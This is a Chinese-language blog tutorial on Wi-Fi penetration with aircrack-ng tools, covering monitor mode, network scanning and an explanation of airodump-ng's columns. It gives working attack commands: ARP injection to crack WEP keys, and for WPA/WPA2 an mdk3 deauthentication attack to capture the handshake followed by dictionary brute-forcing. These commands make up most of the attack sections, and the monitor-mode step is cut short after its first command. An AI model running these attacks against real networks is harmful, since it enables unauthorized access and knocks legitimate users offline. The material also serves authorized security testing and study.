无线网络渗透基础原理
无线网络渗透基础
设置监听模式
2.4GHz WiFi网卡
1 | sudo airmon-ng start wlan0 |
随后系统WiFi断开,wlan0接口改名为wlan0mon。
5GHz WiFi网卡
仅支持芯片为RT3572和RTL8812AU的无线网卡,前者开启方式同2.4G网络,后者需要手动开启。
安装驱动:
1 | sudo apt-get install realtek-rt188xxau-dkms |
查看无线网卡模式:
1 | iwconfig |
发现为被管理模式,先停止无线网卡接口,设置为监听模式,再启动:
1 | ip link set wlan0 down |
网络扫描
Airodump-ng
1 | airodump-ng wlan0mon |
输出结果中每列参数:
| 列名 | 含义 |
|---|---|
| BSSID | 无线AP的物理地址。 |
| PWR | 信号水平,信号值越高离AP越近。为-1时标识客户端不在能监听到的范围内。当BSSID和PWR两列都为-1时,网卡驱动不支持该功能。 |
| Beacons | AP发出的通告编号。AP在最低速率1M时美妙大约发送10个Beacon。 |
| #Data | 被捕获到的数据分组的数量,包括广播分组。如果为WEP,则代表唯一IV数。 |
| #/s | 过去10s每秒捕获数据分组数量。 |
| CH | 信道号,Beacons中获取。 |
| MB | AP支持的最大速率,11表示802.11b协议,22表示802.11b+协议,更高标识802.11g协议。高于54并包含点号标识支持短前导码。包含“e”表示网络中有QoS(802.11e)启用。 |
| ENC | 加密算法体系。OPN无加密,WEP?表示WEP或WPA/WPA2,WEP表示静/动态WEP,TKIP或CCMP为WPA/WPA2。 |
| CIPHER | 检测到的加密算法。取值有CCMP(WPA2常用)、WRAAP、TKIP(WPA常用)、WEP和WEP104。密钥索引值大于0为WEP40。索引0~3为40bit,104bit为0。 |
| AUTH | 认证协议。常用MGT(WPA/WPA2独立认证服务器,如802.1x、radius和eap等)、SKA(WEP共享密钥)、PSK(WPA/WPA2的预共享密钥)或OPN(WEP开放式)。 |
| ESSID | SSID号。如启用隐藏SSID时可以为空,或显示为<length:0>,此时airodump-ng试图从proberesponses和associationrequrests中获取。 |
| STATION | 客户端MAC地址,没连接上时显示not associated。 |
| Rate | 传输率。 |
| Lost | 10s内丢失数据分组。 |
| Frames | 客户端发送的数据分组数量。 |
| Probe | 被客户端查探的ESSID。如果客户端尝试连接某个AP但没连接上,将显示在这里。 |
WEP密码破解
找出AP的SSID:
1 | airmon-ng start wlan0 |
捕获数据包并保存在wep文件中,文件命名自动添加后缀为wep-01.ivs。
1 | airodump-ng --ivs -w wep --bssid AP的MAC地址 -c 1 wlan0mon |
捕获包的速度会很慢,尝试实施ARP注入攻击:
1 | aireplay-ng -3 -b AP的MAC地址 -h STA的MAC地址 wlan0mon #-3表示ARP注入攻击 |
等#Data列到达10000以上时可尝试破解,否则继续等待。
密码破解:
1 | aircrack-ng wep-01.ivs |
WPA/WPA2密码破解
找出AP的SSID和信道,方法同上,获取数据包:
1 | airodump-ng -c 信道 -w wlan --bssid AP的BSSID wlan0mon |
实施死亡攻击以获取握手包:
1 | mdk3 wlan0mon d -s 120 -c 信道 #-s发送死亡包的时间间隔 d实施死亡攻击 |
返回airodump-ng会话,当右上角显示WPA handshake和AP的MAC地址时,成功获得握手包,文件命名规则同上,扩展名.cap。
准备个合适的字典叫做passwords.txt,实施暴力破解:
1 | aircrack-ng -w passwords.txt wlan-01.cap |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 The Blog of Monoceros406!